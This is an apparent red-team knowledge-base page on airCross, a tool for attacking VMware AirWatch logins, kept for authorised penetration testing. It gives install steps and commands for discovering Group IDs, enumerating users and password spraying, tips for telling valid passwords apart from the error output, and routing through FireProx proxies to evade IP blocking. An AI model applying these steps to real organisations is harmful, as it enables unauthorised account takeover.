Antisyphon KB

airCross - AirWatch attack tool

Nov 04, 20243 min read

IMPORTANT NOTE:

2022-09-16: Initial indications are if your customer uses AirWatch, they will have a vulnerable certificate in ADCS by default. (Internal escalation to DA.)

  • First noted on 2022-875 red team.
  • I’ll update this with more as additional info comes in.

airCross - AirWatch attack tool

  • User enumeration
  • Multi-factor authentication MFA bypass
  • Password spraying

Reference: https://github.com/optiv/airCross

Install

 
# Install Go if it's not already installed
 
sudo apt update
sudo apt install -y golang
 
# Install the golang "net" module (dependency)
 
git clone https://github.com/golang/net.git net
cd net
go install net
 
# Clone airCross as a **subdirectory** of net. Required for how go modules work (AFAIK)
 
git clone https://github.com/optiv/airCross
cd airCross
go build ./airCross.go
 
# Now you should be able to run airCross
 
./airCross
 
# :)

Usage

  1. AirWatch domain and Group ID discovery
./airCross gid-disco <DOMAIN>
  1. Check if single-factor authentication is present
./airCross gid-val -gid <GROUP ID> <AIRWATCH SUBDOMAIN>
  1. Enumerate valid users. Generates a login attempt.
./airCross auth-reg -u <EMAIL ADDRESS> -p <PASSWORD> -gid <GROUP ID> <AIRWATCH SUBDOMAIN>

Output of a valid user enumerated looks like:

[-] [jdoe@example.com:test:AUTH-1001] Authentication Failure

Invalid user output looks like:

[-] [doesnotexist@example.com:test:AUTH--1] Invalid GroupID

IMPORTANT: You will also get the Invalid GroupID message if a user’s credentials are valid but the user does not have permission to log in to AirWatch. (For example, if they are not a member of the appropriate group.)

Recommended workaround: Run username enumeration first by testing an impossible password (for example, a single character like “1”). Then after users are validated, run password sprays. Then any Invalid GroupID messages observed in the spray output will indicate a valid password for a user who simply cannot log in to AirWatch.

  1. Execute user enumeration / password spraying:
    • Log the output with tee!!
    • I also logged the output with script as a backup. :P
script <SCRIPT OUTPUT FILE>
 
./airCross auth-reg -t 1 -gid <GROUP ID> -p '<PASSWORD>' <AIRWATCH SUBDOMAIN> <FILE CONTAINING TARGET EMAIL ADDRESSES> | tee -a <TEE OUTPUT FILE>
 
exit

AirCross with FireProx

  1. Perform AirWatch domain and Group ID discovery as described above.

  1. Record the Group ID for use in user enumeration and password spraying.

  2. Record the authentication endpoint for use in FireProx function creation.

  3. Generate a FireProx URL that points to the authentication endpoint from the discovery step. Best AWS walkthrough is here https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b.

  4. Pass the recorded Group ID and FireProx URL, without the URL schem (no https://), as an argument to your AirCross invocation.

Graph View

Backlinks

  • No backlinks found